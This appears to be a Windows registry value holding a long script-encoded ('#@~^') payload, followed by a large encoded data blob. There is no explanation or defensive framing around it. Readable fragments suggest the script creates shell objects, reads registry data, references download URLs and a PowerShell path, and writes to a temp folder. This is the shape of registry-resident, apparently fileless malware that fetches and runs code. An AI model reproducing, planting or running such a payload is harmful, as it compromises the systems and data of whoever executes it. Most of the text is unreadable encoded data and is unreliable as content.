   a REG_SZ         #@~^A4EAAA==n{F+2i@#@&l{xAPzmOk7+p6(L+1O`r?1.rwDRUtnVsE*i@#@&S4k^+cne'c+b@#@&`@#@&7DDz@#@&i @#@&diWE mOkKx~^9x`*@#@&id @#@&7diYMX@#@&77i @#@&i7diDnO!Dx~CcIno"nmNcrCnSH'-kG0DhCD-whbmDKdW6Y-'UnY,0Mlh+AGM3~/OEa-wU9w-w-yRTRlTF {'-kwJ*i@#@&didN@#@&d771lY14`#@#@&77dP@#@&d7d7.Y;D ~!p@#@&7id8@#@&idN@#@&7i0; mDkW P9cE*@#@&di @#@&iddXxxhPz^Ok7+or8Ln^D`EHka:^  jD\n.oHJC:PhRc!r#i@#@&i7dXRGwxcEV2KrSEB0l^dn#p@#@&d7da k+UNvbi@#@&77iE0UxmR36aC N3 \bDW :UYUY.k odcr]Yhwu--rbQEc/!4dY.r ocEcslkY(U9+66WvJ&J*Q8#I@#@&idd!0 O'!0U_rROhaJi@#@&didE6Ox0cZM+CYnP6Osbs+vEWUD~Y.;~RF*I@#@&7idb0`!0Db@#@&d7dP@#@&7idd!WYcDbOn`XRM+dwGUk+$W9z#p@#@&7idd;WDR/VKd`bp@#@&ddid!W'6R/DlOn:+6Dok^+`!WU~DD!+bi@#@&id7d!WY{0 !Ysrs`;0 O*i@#@&didd!0kxE6Y ra+U)kK+XO?DD+mhc#p@#@&d7d7;6/ ICNv bI@#@&d77iEWRq.bYnvE6/R"+m[`!0ORUk"n  #*I@#@&ddi7;0kR;VG/nc*i@#@&i7diEW ;VWdnv#I@#@&7id76RG+VYok^+cE6xObp@#@&i7dilR";U`r-rJQEWU3JwJ,&;!knO,zxG./OlMOr~TBF*i@#@&di7d6R9+^+OnwkVcE6x#p@#@&did)@#@&d7N@#@&7dSxlc2a2mxN3U7k.W hxOUYMkxT/vE]SkUNbDYE*i@#@&7d6'xA~b1Yb\n(68N+^YvE?1Dr2DkxL wks+UzkYnsr(L+1Yrbi@#@&7dbv*x6RsKsND2XrdYk`S_E-wdH/AWScr#I@#@&dd2xS_E-'E3`r+cQJ/H/SGh+cE)r/zdD+:2+J*_J'wAk NKhdwGADdtsV'--qc!-w2KhnDk4Vsc+X+Jp@#@&7dStrV`ZWcsk^n2Xk/Ddcw*#@#@&7d`@#@&d7dS-'6R!nDsksnj+./bG `A3J'-xKY2l9Rn6Jb kwVbO`rRJ*I@#@&idiE['EEp@#@&di7Ea'EEp@#@&77i/AkD^4`A7$ZT#@#@&i7dP@#@&did^Ck+PrXJ=@#@&i77db0vkcb@#@&d7di`@#@&d77idE[xrtOYalJz[Kh VWmNchk1DG/K0O 1W:J[WSxVKC[zOzRzz10+FTcZO1 8{ c*C* 4[m2RON8848m*6G+zg+OsX TjhF{Xcc+6EI@#@&did7d;2{J4YD2)Jz[GSxVGC9Rhk1.K/G6YcmWsz9Gh VGl9z$&Gz,J$fOAA8ooO+vZ,Rc$qZO1&2*O+fT/l%!zb{zqr NGS/U+D7+M+!Z&R|~,0O&! avWO2g! +X+ri@#@&77idN@#@&7didnsk+@#@&7id7 @#@&id7id!N'rtDOw=z&NKhUsKlNchk1DWkGWYcmK:&NGA VGl9&!J%&^J!%^qO0Cc *1cW c604 ,9m FX!O!XF%mOnzg+Ywa+!Un8{a% 6nJp@#@&id77iEwxE4YOw=&JNGSx^Wl9RsrmMWdW6Y ^K:z9Gh VWm[&2JZJ2&2/3O,X%2R Z!fRW**9R~v0F Rf$+FZAcWbW&bx[WS/pK |AO%O&! a0v 2gM +anri@#@&i7di8@#@&idd78M+C3p@#@&@#@&idimlk+,Evr)@#@&id77khkD^tvh\]qD#@#@&id7d`@#@&d7di7mm/n~r!Jl@#@&d7di7b0cbvW#@#@&di7di @#@&id77idEaxJ4YYal&z9WSxsWC[c:rmMG/K0O 1W:&[KhUVKC9zfJZJ%z2ZR/slF3O8f19 cfz)Ozb2zRXZW%GF/fTXlZ&bUNKhdc!OF$Ov0,2T 6WRs/Eri@#@&did7d)@#@&7iddinVk+@#@&77didP@#@&d77id7EaxJ4YO2=zz[GSxsWm[c:r1DK/W6Yc^Wsz[WSxsGmNzz&GJ*zz{XA;!8GRvf/AO*GGORs)* bs$X; qAz/lc&qk NWS/+ ! |$,+%1fZO6RRs/ErI@#@&idid78@#@&id7di8DlVI@#@&d77i8@#@&i7id8M+m3i@#@&i7d)@#@&didrWvmN c#{'!*@#@&didP@#@&d77iNcE9bi@#@&77i8@#@&7id[`!2*i@#@&di8@#@&diclc2U\bDGUs+xDcJhDW1nd/r#*`ElEb{Jr+X~`]KnaDR2U^KNrxTD=))UZ&qRV+DjYMkUov$/G \+MOT=)sMGhAm/v*?O.bxL`E[Cx*9}aGf}Gx}U.!e2I2( Wo}ypg/o^G9pK9/#~tmsoY&Zt(i!sH5qFsN!#H|oA7^ ^!C OEnP)kK s!tVsT(&x*nUI`^xjVF.Zo q"*mV#4o.!TBoA4mssO}p]^mUHk F~t^hwY}p]^mrt582129M^\4N!XF.Zo F"*^!jNq;]?\(I8^h*`+oAsn#Oq4+V0p?0G9}K9Zj]`+pA^} .2(M"VmNF(}(~h]MOYe ^E(:Gv5&.H^h.!NAI-4 oa4r*At\w8hj2+ X44 VN}o1"\8k4_3KF2lV[X8nehaV52}o`&V.[!.DS^9s}ha^5fIa8 WE}pgy} qb4uV}eqFsnZx?}q}ktg!t"2t XV}yo!\?qaFj6(j2V"N!#DSs9^t:XVef"w4+*!I Fa[;*$1&gV4q9knjxFCX3tpxA5yHV1&196%wUNqc2SV]^}hV!tj"*8hwYl Hg4+I88VjG&3^EKq.D8&x*PO3[ XVqbA3\:sk^+jaS0Is}hs!}#Il^M`W(U5kS/BG4!s.^H6}9x/lqHki jt8Mj3J3wEmysf(Ms.^z6~NoI-p+a4mfHbJsDKnpg!} T!Kp.k[VV%I(g!IV.kt9t[MjNFPk1ZTV9xsIl^!.;NqVd}!#HSVI^t:^Etig\4UHZmU.N[V,znZx?.w1StgweXre 8VSA4w\M.;n#1a}H6}N Bkl HbJsDKnpg!} T!jh.s8V.%9M^\4b*GeX/Clx}+OENs#E9MV78U19rNwPN!o!}!sHtZS3i!wX5 q^N!.H^H3;` j!?qFS8MjYtl!ep"w4yXM(Ms ^zobj .;N!sD}j6geltt+j3qrVFf}Wx/UIi(~Vp .a8M"V^kl2t \w4s#1\(IK8+pKq0V;Nh1M}jqk(V~FehXw5za&l I^} VPm1/Ks.2i X\[ZXCpx!Nqo/&kh0ih.ZNo9;.usS}jh0iMwXe 8VN!#Hmz3!iy.TU8h4V.Dtl!e("w8+lM4Vox1XobiU.!NVVO}jag5 *4t j3(r0Gf}GxZp9^[_.z(kz3._VStjxFCX3tp&Ep2BVI(I^#uVS}Uo2rATnZp!g/o^:[ lLN!s74rA e5!F;(k1ZT3xiMwXeZoFoDp5oBt(.ZtpqKjV,"lp]a4+cO\ZX1e l35p]7mU3OBwIz9`w(UA(i&"XClxpjz3Kq1396^JoY55o944 #Z}pqKiMOyCp"w4+*OHj6geq*VI("\m 3OBs"X[`wpj~4j2]Xm* pjb0j_9-5+#0Np9^FKk1/L099oHlmfI^8`s"1 jY5s6lK.DA^C~28+8tlqXN}LwG[p9H}q*TI!1D5 V!J39V[3wym+#D5h6atoHGn(X(lV.Ht?8ne:aVef"G9w0E" 67ehskpo1"} qb4uVGegWtjzYp X0q/I6J06-I w!lq,!JVgh8M^!F/xmqbs4dKs9JV.XNqsdmzLbjfV.[MjYJh"/4/(a0P/g/T3BxsjEmysstjlt[M^ ti8VNV4\\CHOBo1lm2Is4io.m+.De:X*JV9VNo]lm!jK(0F2I&x\my,s[Zl(CWy\rl.4 Ht\:.}epIaNs.H}p]K4+I.(k0G9}K9ZpB^Nu.H8bbVjly5q}^P:w!C(\VP j!lV131X*_tpIg}oIG4+}KqVN^[s~X8+gA}!]H}p1.(b3;Ul 4yY^FZ"E[X/J3zW8H*1&I^8j*UNq*Tl q^SVV![MjX8f~K}pByl 1^^H*(Il34V.Ut\NF2lV[z8n5s2VI&pTifV.NV.OSsB84UIa8`Ej l!}pB7mo1^^ }2I jyS0t48:"/t.xVtrTWKs#&dj,bCh.NN;AB4U]5NuqaJZ".8Ugt}h#}5pIa[s.H\("W4yI.J39V[28V[!4\};Lk" .ZP ,0Nq6s?!o!}!6^(k0Ej l 4+O^|/I![q6dd2zW9AF7tCj/t?0wFj0/9w$X( 1^tu.H}U32rATnZp!g/o^4}U^!}#O9(jb0^GF85 OENs.H[sZv63\X8+8Z5oHVgLI:[u9a4smGqst\NU1 F&4\e 8! oD.hFa#jNtj!9h+jw782\Y8M46eh8t?^BlsV48#}Dlj.p}#[_mu1m8 XM8T\WmiTH5iwUe`wtIa|4qVj# D(] OF hO/I $/mCsm]+snjssG oD+!Fa#.96#T9t?sB4+!Fa#jNqq3DsNZs~}jwc\s4A#h8/+q]1\2}Wjo}K50.(?oBNlu1b]y^;n!D5KioxN3sA]0,39!wc.2oS swj]y^W V83INosCA\8V6&jsIGl!H!439WCF4L}i83IUHw}!60]0I(`:x?+qqHP3xc\s1! V9?+j2(I3tUeUt+5.tCIUt pT6l]:jH}q9tI!#:NqV0i8N\IF"fK^}mt&K\n(\*Csx?|ys/`.}D]3wj}^w5HU[ZrPs;C j2Jf9c+Pt7j/,Ajw2q:y4WHow7[s\fj("fi3^!I`#qmjImthN~p:tJK!#GpT6N}x^H#TgKKoo;}TpWt8A45?O6?sI^Cja5t(^|ihjKI [An!. tTs~p`,"K!VXI#3y6M8H !j*K!]^li6UtsV\"2^Lj_I2i3"wnVgCt"x5rAoA`2Ya#PHSl^.eji37?pAUtVgHih\*Ko4sjipHjoAo5:"A1^9;\Fw3iW\ih\*IVt:9!*N[#NA}s}fKh]"KTw0tjg|#!\KKs]bppw2}y66}j^!KNVx^MgZe3w2ni"h5Z]k5Ls;CT1A|Z2X+PeZj9IA\Fj2C#45Nz0S9Ia\woT:y~5ly17#!l?e!xI#pI*.N499fsGjp.^j`9opiox?3N;}3jA}i9hp o~ppN~}`s3t&I*+^._8!A\6jg|ih\wI [An!.VtT.~p`VTKotxKhhl}jgHFq~nlT}2}36Vj:s#"FgA+ Vo K9K[FavPP"!?ZH91&Vh69jHpq,+K+4N49AV (5*}T^!+i]x?3t;}0.$5jwpHy3.8!jAJ av^3ADH8H&Ik,Uts1ANyVU1#]sjUV+ ("&i3wpN+VZ1Vs~}`s$\yg&p0I~}L~K KAc}#w*KA]&`2Vjt%Vq1AVdI%#x3s0}&jH u9IIo4slU9&8213mMgZ1`9"Fyg&P&gqCPzy1V2.`jV~83p7}V.iSqtspTw~Hs~2}V^11To&!Ia\woT\y4L.qN+62w3exjHCUwIp`oA5!w`ti1tl s$pio~pThH}&"VPVwp? ^H9A~P2HzmKw5}Z,q f~LnV9r#U\;jNtE`V$ !Yxlj}eNT}25qtm8F4Kt3w*p%]yroA~}`s3t2w1j0sU^j"c[!S\#!\ZH:#A"L2l}#Ahl:1oI 4s%s2HC"9i3^!KiHGlus~]y,/dyg.?`2WCkRht(gfPP4Z}^4/93w2C3s~.^V+m+^M+!,48("}e 84 sj.qVo]2AXq:O/IsFkCCwk8w|isacqoYj:Fa##N^.ZNAmq2743}7]:46PPxt?sB4?sV4C0wOm.j(l8N_8&jl8 XM^!XWmj2CIjwUe t\5qF*4 sj.fso] w|ihwc4 sj.f.mjZ.f5jwApooS 2w8X*t383I 4qj:tb]it&js1Gm+B_r wWCF41}i^!pi]VKTI2}otpf~5jjI_64lP"M\ijcmwsE:2tUt!tK5y*dpU4M!1~P"M^Tj34!]VI3tUe^9XILxrp oS#y"l]Fx* s9k?wBkCwN6owVNsN9KusV}i6G# w2t#g& ]:.T6N#A16jVax+b,l[x^;iV&DC XI.sq2UV.s hWHN2pXHiBM}ip7[&4*HhOpST]&jP.h6Voa:O!.01x[2gpj("s]i4wIw2:\!s~63yt}`19k!h;+i6o}fghiixxi94 j!s~j2sf\Mjw?^t^nja?t.gM[TADIq[x5js~Pf1tl:soPeW4i6It(^Ht!jwKoBsli6Ajq1}9C9?IVV+i!9x\VTc}iwp?ys.tyA$##t"pU,BmoBsjT6Utx^H !\II9Bxm3.;tA2+`3&yjqI"8kO?tx^2th\&KsHFj!IstUN}}wsK?h]^pTw`tVgr#!xA+U[G43cljoI6}j^h5Z9b}j"*]C~L]!xZH`BD5!pM}PVl1NI}13}..iIa s4&J"~51!VS9Ih\wt.I O(K^9N}Vw.[L^63^!H`H99."}V.~p`V(ITB;Iis~]&~AeiwANTo~pip.[NVjj9\pU%l}!a?t:^M[TADI`tI"js~jpIt.0V649s~pThMi2OD]993K3txH#._iZs.9}1812 xa1HC"S}T^y+`0cgK9~8f}hlV1dH3t\N9VGj("*]3^q?3B;Iis~}jb"mKg\I`27Cxah}?kyif9kS8B:`!I2C m8.V}j+p2\NuN5}.~&CP5 pio~pis \2N/"2wZHw1\\gAi(^H}f9p?j#:}.5Zj 6V1`Vep ]GNi6^[Fw2th\;mV47mTtKeZqq5VADH2Nh^!4w\ft!CsjI?`o/"Z,0t#p7.s}9?V(Zj3t;jjZ\}i45}!VS9I 6AF#\&aypqIb[jX;^.wA}iwf?^]V5!6$^is~p`s9K/OGN/Y}}.~9t"x5H3ohm"9a\jtU:F\5HV1+#!l[:a?HhlIlq2m!Va#st2IGN%.o27o10}(^ZHuIcj3o~pipS}`Fj5."6I_N2PZOjt3&6HiwMH:sA`2,a\T.wlV}CHp^7rPsGj("9i3^!KiHGlus~#0s3.z\jN}2j(a&]L^V#"4EpZ#A5V}$#fNMl0V(m"4~pis~]3l(#%xhms[_m!6m8y6!m3\Wmq1Deja? Kj}e ZF4qs.jFso]fAks,dIhOklusb] w|isa? o$KhFa#jNpj!9\+jw782\Y]:46P!8t?^Bl1sV48#9Dlj.p5q[Aj!9m8 XM8h8hmq[_5iwUe`9Om.j(ljw782\5PM1\[!9ApoLhj3.`]"VK0FVIsHw+uA\83Xqisjcl!H!43}m^yI!jj4WpsVV\.gc\s`hi%xHw#1\2}hj3wy:A(?oB`+!Ymj2a/ Ug3Iso&KUwa]Ns9f~.j2H6jak^ "Mj39/HVo(U2tUiT9.5jtA4!sVH!YW\s4.iP&*I!H.}35H]8}G\295?w90n2ak83Whn9~5}8s(gwm t01`FVIVOw.%I4 s"qisgc. o&?h6m^yI!:j9MlyVV\C^c\s4\#Pg/+^oL\252]ft.5N9}?oBspsI0j2ah Ug3I%s_1 *a]NHzf~.qqHnMX16M"M#T"9Nj2C3tUthty50N luLS9t0 swvPpg3IVoG1 Yb]2VBqswj?w9"CCjl sx&n9~.KqBq\CA^^+IVI`Hql+B_+iVIiV"qihwx}i]AmPAm8y6!1383I 9S]39!8Xk!C/kcp`oCIjwUeUtM48I$pio~I3tUe3XrtT4hIs2.}3}Z[V,/f~(1wWW\yTc6M"M[h4??s^&"2tUeT6mp2}i}o2.}3}WtFt&CP~AK ^WpiFaJZ1\::8tIV}a[F^3iXDHthafK^]}jwI 3sH|8VTKhH~j3w$iVAFC XI.h2A?s.A oWz9&5*H`1s6j\LjjW*eTwc+:]\:LVN}poSjwI+N+]NjT60e.gHiha*KoBAp%I~6Vs\\jgKKw1G}!X.}x^HiixxI;1x`2,~6 sn}s1f+r0Z43*ajXC3^/r ox43}\]_}3"f"tI0s~}jA [y\Ht!4w?s]tjC928fIqlAVTKhsxN3}+}?ky}V4wK3]t4i65j`V3:O/Ks9x\j\?}.zDjqjmyst(Na\o}2l:s mT3lpTYU}.\sP+DI.sB&.iW7\w}f\yt6NZp.PMXx\yw&]9g.IVs5tYa#Ps.l^jAH3TWppA`#&^H#o9*?qt~.PA~6Vm+j3AhHVI" 3wxJ 9pefjFI;OA}Ks~H!hlHAVTr ow}iws# 1&ts9Z+ 4qKsI$#j.Bj.z*.^wx[Vww\20cCP"&jq[A5js~jp.wI`V]pio~piIl8 Xei"pj+oKjh5lJy1}Dw?^9o}K9&[XDCCiwAp`o9tj9Aj 6V50VTIhBxmTsgJy42is9w?qtAH#.hCw2T\swl?Vm762DL[392Jf9hHA]9:3}b}s9_K.1 }+HZlU9o]&IX]V^!.iqUpT6;]A.3jV9xIw9oCja5#&^H}TOy+qVyj:,a#%s2l^.f+3o7N9sN}?kDt3"5.i}2P.hJypa5&I*Is1w]!": 2w?efjVIVt55.90}j%7j^NXKo]o+i6Aj1&nPg5?"t24i6U#2V\53^S?^9o}!l?i:4I#PwnK^B`V27\#}M.jbX.%$xNUN$#.4\#i\r.!2j9IjiGV q3\2S8}0}!a?#FgrisgWjU0yj /7\#t".:IdIU25SqN$#.49#i06IU#VpUs;]0,6`:wWjU%X#:9n62Wcj""!I s91&Na\"2Wl^V%piq~pisjif^ V\fpU42p#s~}`9edywl8.56Kw*if^(i3" IVtA:xsd8!t"S.seK#LX1uw2]xj2no4j?U[ jisq o}"j.\M.w}ktCwI] 9APiwApotx5Vs~}i9oKU%X/0..iVW[F9xC l}Iit~pis~iGt \jjZH`9x[V^n6K4pC3^Dp`oA5!*Utht".sFGN"o&.i.jJy06}T^/rj1g5T}7jobz53x.p`s~]ZOM sxAtowKI [q`:Yq\ I`.:sV/0..iVW[F9xC l}Iit pis~iGt j!jZH`9x[x9nJ 5his9XS8tyI!}7jpbHp09%pio~I/,V#sxAtowKKsBs+osq[Nt :!jZH`9x 2ww\sTct3xSI;Of1fsAe+1V4ZVAHVB;}Ts~}jxqHU9(lU$xm99;]sq-"V^?pqI"#CxfJy4CTjZH`BS: Ya8sVwl:tV}s4kNVw2tFwA#s^ m+^MN"Aj\qs\\swWVsKCMxtCCwH["xt?^BVsVm8+6V1yF-ph2ju1jjKwCPT"pSq#x493lPqI!}2j?IVI"#ZOM#FxZtowKIo[An!. [T.~p`VTIqBx4358jKwMHi\fKsBN+os4}y,o5jwfK^9"Cswc[F9DC l}I`]A5js~j 60+0VdrP$x493HjS*\i^/rPHx493ZjqhXgVzc.^Vw]LwZ]C\q]9"&10oI5js$##oZ.`}}S+]"lVt;e.gSt!9IKVo~pi27nw.-`j4.IqtN}.~W}.wZ}iwfKA4K`3s0i#1}js}*j#eX}us_tL06FT8LIU$xm99;}:I$5jw2S.bZ 2w2Hs4|}iwApqsvjFs"jo.w+_Npl+s!i.A[!wA}#z\.+^7l9}AHwNa5jwApqs i:OA]2wA}#z*HU11I!}SjpbHp09$pio~pso7ns9}ii4.I V7pPml[HYom.wAp`sx\jI\]35\t!\v?ABt5!Y0tqsUp`s$p#tD4qW7\FT!J"^nIU[&jV%7ns9(5:wf?yI i.gA}jwAJf4.Ijoqjj.atTpM+`2.HU[VI/,}[L4P3jZHiBxIPI~}Zs$5j41lH%.#j^c[F9xC l}I`#&5js~P+w41H%-Sz0..iV7H:^St!9j4fe7Hz%7HV6!}jOyK;,W#FwIjsjs8"\K?y]x`:,~jis~p`}V.z1W.q."jsjsHU1\S"o8mTm7nwN]`j4.Iq%yi!D3tF5\t!\;SZt}`3s0i#IHpH%*.hOwp%s;j!ODC l}Ij0..i37nwNo`j4.I:}2# ahj(zX}V^!INsM}.o6!*GIAs9I9[;./,.}jwI}iwfIo2GjiF~PytK}sz\SyV"iDWe!wpC3Xyp0oA"2t;ei1d}VN]Iio~pis$#9ZC 4Zp 4}?%2M#0* j:XVKwA0i3w3i.t* ijrH`BMj(92e%I~`t#I#t7Ns376jM[TADI B Iis~]0p-\2gI.q3WPy9c}gA}i^ K.tSUM%7JzYt+`VdKi2GpT}li?Ds#owspiog5T}7jobz53w.p`s~}!lL}j9S]ijfI:$Eqf.d6ow"l:t(4f2hSz%7HC\}nu9(}+s!i.;tZs$5j06?`s\8FwIj."Kt!\/.0dc"XYl]+pXp0}4?sBGj H76jM[TADIP#"pis~]01\`3gIjj2[j"fijwACPT&4ZXFmk%7Hu}7lVjAj!4glTs~}jwv\%wpSTt\pV90ij16`3gI.j._C.j.\Fjse 9M.Vo9`VI0i#I&pss9?+] jit~}jwAJf4(I#oI.i.KeZs}mj^xp`s~}!Xce gM8T^hH0BA\!s~}i1}jZsu?T#wpTjS8VTFj"4Mj#iZ43.n}8p-":x?pqI"i!SD]CI&t3\?4yBs:Ls;i9tqmZ./HiBxNUNhJ!OHj!wcp ]"j%Ah8w}-\2jrH`956K~|}F"q}hwf?y]x`jw~}is~.b%*.sBwI%s;j("sjVgKK3Hxj3.wj:s#U3xWj8}D8!w\.aIJ"ws58t6: Ya8sVwS.V6/0lKT6U}Fw.Cp9Wjj0XIiV4}`1$5jwZm`sV ZOM VxAtowKKAXl`3s0i#H7p`V$pioV}us~if0hjVx;S"ok}us~iG3AU3g;S.sDt!wx}jwAe 92Sy]f`.37noNjj`t#I#LX1 IoHC"sjVwwIu4;.3Ij\jVtLwV|yYxCfxZ]MXLjVxZHA36Ix9;#+oWj:1#I#tyro}5]j&6}V\r.oiH}TsMjwVog3aj+;%76."8&I!Jf4.rwoqjj.a6!IsV6+pTB~pTp2}Vxj#s\l3T7smyPwb-dXR*48V&jLwZ]Va(#hO/I`2f5!w}ei1d}VNiSTtjpVs0i.t\Jf1cpioV}!, ]`ca539WNZ9& jjw#.wDjqzc.s]s"Ls;j#AwIA3a}VoqKzYN]F&X}V\l4TBw%s;iGt `3jZH`9_tFj?8Vjs#UIc.NHs5Ls;j#t~}w9/.!o;+3N0i.x(Jf4p#oI.i. 6wsHd&4(?js&#jj.] ^ICi4}IjtY\ ,U8s.w.NmaN+]&.i.qtL4iVjMHiBxj3._]wA$jj\Zm`sk}xwA# K\}#&cpjt:}s}:]iqXp0VdIi2;jTpMif4pC34&pVo~pUs~j:sHU3g?jss ]:OK].K6}V\2?ABt5!Y0tqsAp`s$pj1W.VF"jsjsJ"gIlTtx43.n} W-"V^?pqI"i!":}Fw}}iADI`qA"js~]V*7}ANjHVBV5Vt;ejgSt!9IIio~pi27nw5A`.4.IqmWij8tL4H3jZH`BM5VN4]V9_}wsjut!pV.0tFx(Jf4I#oI.i. 6ws#jKxWN..&#jj[L4iVjZH`BS":1N8s.wNN13. ]"jzY^}!&6}V^ K9LyjThMPG}BUs4.Iq3W[xahP ^sJqz\Sy4L5.AKPp1~p`s9Kusg5T}7j(zX}Vw\pio~pT*ji`wOm(aCI_N"j:8WtVK66#g ?.$I`KV~}is+K`I$1iq`jPN}n:t!P#"!4#2DPsm#8.qqK&*NA6_ (9l8.aYPitFls(XtC1g#!/XKVwBNiq$jpNtC:tFP3"DHia$?pt}i.I*:Ma.HZs~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$p#]qm3s~}jjA}iwApTo~pi27J.t$5jXxp`s~}jwA}jwA}+9Ap`oA5js~}ish?GN-KTotjiw+i!1!}#jvKVsq}uAbC0FXUjtFIjIw[&j2iODiiwAp`oM53}~}i9gpjsBp#t~? sq}jwA}iwApio~pi2Z}`s9U(9yp01 }jwC}jwA}i^Wl`ox5js~}i1IHVFBpTo;pis~}jw&}iwApio~p#s~}0s$5jwApZs~}j\A}jjA}iwAp`oAjjs~iis~p`s$piohphV~t!wf}iw2+/1 pis~tZs$5.wAp`.~}jws}jwA}iwAj`oA5.s~}is~p`s$pi#~pis~}jwA}iwApio~pis~P0925(~xpZs~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`op"ss\tTw\p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwAP!k6jj#DjVIjnV.~NZNBpTo;pis~}jwD}iwApio pis~}`s$5jwAp`s~}jwA}jwAH3wAp:]fgj*j]VwV.:sH+## .is~}j"I 99piB pis~}8V$5jwAp`s~}jwA}jwA}iwAp`on5js~PTs~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis0C3^FP#"DmT2H1!w~}`p-5j"m2s_j.t\ns9A}i"Ap`#992.n}#1tpqN3STq5ro}U}xxA]3\fHpsx1i6w}`.$5j^fNq9~]jw1]FI6}s"f+ t?m(}S8ipXIGsBphoW9IKtL0h}p92ITB2pT*Kt wqd&^;S8.~n:9v[!x\[T"1}ZoZ53.~}VVAp`Io?#o~Nfta}y^Itua1Ios5r#Aj6Gt$53wfpssw#ZOM#(^A#iwWK`(!5:N}P+Ny?`1s|q$kjht:if4.6#xZKis~Kis~n^Ar`K56HZs\#jA\\F9n 9A K_^61!sleTF+NZFBIioVIi}j#3OHjoxZ1o#t.i9~]ZIh"&9Ap`sxC3XZCj"xJ"9L?qOA1&1w[+Nh|Zs H3Bblqs~n2wACs\IlTtV?sN4]Gt$5.Acpj}k V9.#2lAn#"kN8oZmyoS}UNVrApX}3Hx+VtZtM92iV8A? oGl3sx}09-`aA?jV_#!\?[OCJf9ZHA2f`yI~}is p`.2lVq$IVY.t!4&t%Ay4ToV+Vt #jVjq2jAKw}D}V9K^!jw}s"pS8(D1FN~Csb7?`s/+3]apiYh[!5DtoxZ4+s;Kis~}0p-"V\A5yYgH2XAjjwA^TlxIwoAU2tU}q9WI0}%}T]ypi57H24v 9w1IVtX?#NN}jo"\kR6}0F2Pj92[!Z6ii&*NZe!"C9Kei}wpj}Fji#VpWl8M\2}#wA4peXliI\}09a"jj|w}M]C45\2`&jp"1p^Hf`3N e+1 Ij9$pioANUNN[ZD2FTgZ+io KTIliGVhqCIhpsVW]21 J gh}P"pmy]C(!s4\ tX^N4?sB\Nqso]&~*]3Of?p$^#NltZ1]U!gn? ANe39A}^.#T9\+0]C5!wSiqVMN2N9#[_4f.Aj!x|t+wIf4 p+1UPZ,F"V^\pq,~ 9KCs^SPp4.pqHM2.4H#.DjN1%K##xjh9V6s^(t3\&Ip[gNVmlC^wOq2w?K`1~isj? M4hPi^ZK0B}5Fq\sWHAF]}3BMphFIPFwr^Tw;IioApPsGPotU\s\cI`Ig]f~MCFKX 3^jK`B|5Fn8hIN+A9f4#(8p#tm]x9s]owVlqB2ph60]0I(`:wW+qqSi:a\^!xSiUj}4 Hq:jsN6owVmyN9KusV5Tsa[ XYt"gDmT[&.isn oI*:j06.swAPjA\n(\*Csx?|ys/`jsV pNl.0ozKPs.?i2.\FjCi%"pST]&?V2ytyt$(f9nIwthe!8y]:^q^T9;Io\h\!.~ji!..ZVtj3q_piF.j9q^+9;IUH\}T}"PAVBm2"M}8A^}jl1P!g:#T8(}:B9jj,M]htwVN5rooG}TV_}(j&[UxA L2I+.APA9tM&&qtbH.^Zjjt\ni421VHs1&N;P39x?jIGp4 ruN~P!gL\Vjj}s[wjPt~]Z1VjDKS8NgiXOfP3xMi9"fNwHM`3sAjT9AH`.!5+A7ph}VPjA\\V8:}VsV}p.w}jqa5K"/.NIVnVx?}O&}Pjvj8BHdFVU}jY +`} pi17pf12[F4Iii\h4VoAjT37n`s59f5!pjI jZOH[ywM}#~x18BV`xVK PsVp`6jj#tyr#5Wj(I!]q06I%o;KoIGPZsF}j9y}Z.DCK4kj!jCC3llI`oA5(mZi9b7pN. p4;|+N;[3&\8s\wIi42}T9WiA}%1!XWI`*qC292[!g&Ci5*j;OE5yN;]iIUjZw#pVqSKU1;^3gv V"AHf\yli.~PAs-1XDrmZW2]MO2]3g}#3\V+GB9\(Na}TI&I`tGmT[ j91an2& }Vwr4#V7ph}U}:tfU!^*j.bSi(I6[&^&}T8L+0oHd ,G} mZIow3?ieWpis"j:gs\i8xp s2r3Il]0o-9!Xypq9W]L~SHC":}Vw1pj4:mx9&8f1AlV1$p #".#AZ62"X}%"yp#]sli*U}qN9j.zc}yI^i!xAjD2t"41I`B9:KN~jot0+js9Iu42p#. nL4At!xFK!2Mp+YX^AIt53S&4Z1~8!^A (\}j"A!HA3c\!s \st2p`,"H VX.i2Z]MX6341H!2qi2MP0ta\2gCKs."t!ww#VTh]99Lw2\jjqS8sst}y.\ST}HKis~}3jZj3wSIu42K/,~]:HA\Mj.psIs}j"APK\HeqwKINsEq2.~jpIxjAVTKiHGlus~}jx6} I*HiH~j3Vxi;,j`x9AIssa^kOi35ce ^y?:4njKs~nUV+4ww*.pHn5i9;e39(\i^IpP4dr3mX]swo\9IsY0C34 \2xAt3wSp`]WtM,~HoAwIAV.r #5.iwxt^|ip9tIU[_}Tsm8ZI]j!^;1b,S}3w3H2wYiVxlm2HMg3sU^+N~S2V$.h]AlTN$#.4y#i0hpsB4losqJ.3a"2j&IVNw 3wA}jx&to4..^HIU.}Nj9ADIGIi+P#Up#10i4j8#jSpU4XmUtH\0}q2gA}Vw"jjw:Pjwn6oI\p 4xj!hH]u}sI^2.I aGhN;#Vwf]T^f5iH+ph6n]yV.`83H.sI}Kwr s4M]hD}+^sZ`NV#q1~pqqX+s}.5"s7isa 8!"w?osAK }~jy/z5jX}IsN!}K4.Pj\/jTwfKwBImfAx #bZ?yVAHi4xNTs`nVjM#V^9IUsUl352PNA3gx9(lsIh}(g}}.^?j3OyK;1cj!j8}P. 